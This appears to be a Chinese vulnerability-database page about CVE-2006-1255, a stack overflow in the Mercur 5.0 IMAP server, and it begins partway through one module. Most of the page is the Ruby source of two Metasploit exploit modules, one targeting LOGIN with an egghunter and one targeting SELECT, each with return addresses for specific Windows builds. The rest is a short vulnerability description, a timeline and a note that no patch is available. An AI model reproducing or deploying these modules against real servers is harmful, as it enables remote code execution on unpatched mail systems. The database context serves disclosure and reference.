			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP Pro SP2 English',   { 'Ret' => 0x77dc15c0 } ],
				],
			'DisclosureDate' => 'Mar 17 2006',
			'DefaultTarget'  => 0))

			register_options( [ Opt::RPORT(143) ], self.class )
	end

	def exploit
		connect
		sock.get_once

		hunter  = generate_egghunter()
		egg     = hunter[1]

		sploit	=  "A001 LOGIN " + egg + egg + payload.encoded + hunter[0]
		sploit	<< [target.ret].pack('V') + [0xe9, -175].pack('CV')  

		print_status("Trying target #{target.name}...")
		sock.put(sploit + "\r\n")
	
		handler
		disconnect
	end

end
    

- 漏洞信息 (F82991)

Mercur v5.0 IMAP SP3 SELECT Buffer Overflow (PacketStormID:F82991)
2009-11-26 00:00:00
Jacopo Cervini  metasploit.com
exploit,overflow,imap
CVE-2006-1255
[点击下载]

Mercur v5.0 IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discover the vulnerability.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
			'Description'    => %q{
				Mercur v5.0 IMAP server is prone to a remotely exploitable 
				stack-based buffer overflow vulnerability. This issue is due 
				to a failure of the application to properly bounds check 
				user-supplied data prior to copying it to a fixed size memory buffer.
				Credit to Tim Taylor for discover the vulnerability.
			},
			'Author'         => [ 'Jacopo Cervini <acaro [at] jervus.it>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
				    	[ 'CVE', '2006-1255' ],
					[ 'OSVDB', '23950' ],
					[ 'BID', '17138' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 Server SP4 English',  { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
					['Windows 2000 Pro SP1 English',     { 'Offset' => 127, 'Ret' => 0x1446e242 }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 17 2006'))

	end
	
	def exploit
		sploit =  "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"  
		sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])   
		sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8) 
		sploit << payload.encoded + rand_text_alpha_upper(453)  

		info = connect_login 
		
		if (info == true)
			print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
			sock.put(sploit + "\r\n")
		else
			print_status("Not falling through with exploit")	
		end
		
		handler
		disconnect
	end
end
    

- 漏洞信息

23950
MERCUR Messaging IMAP Service Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in MERCUR Messaging Server IMAP service. The product fails to perform boundary checks on login and select commands resulting in a stack-based overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-03-16 Unknow
2006-03-19 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站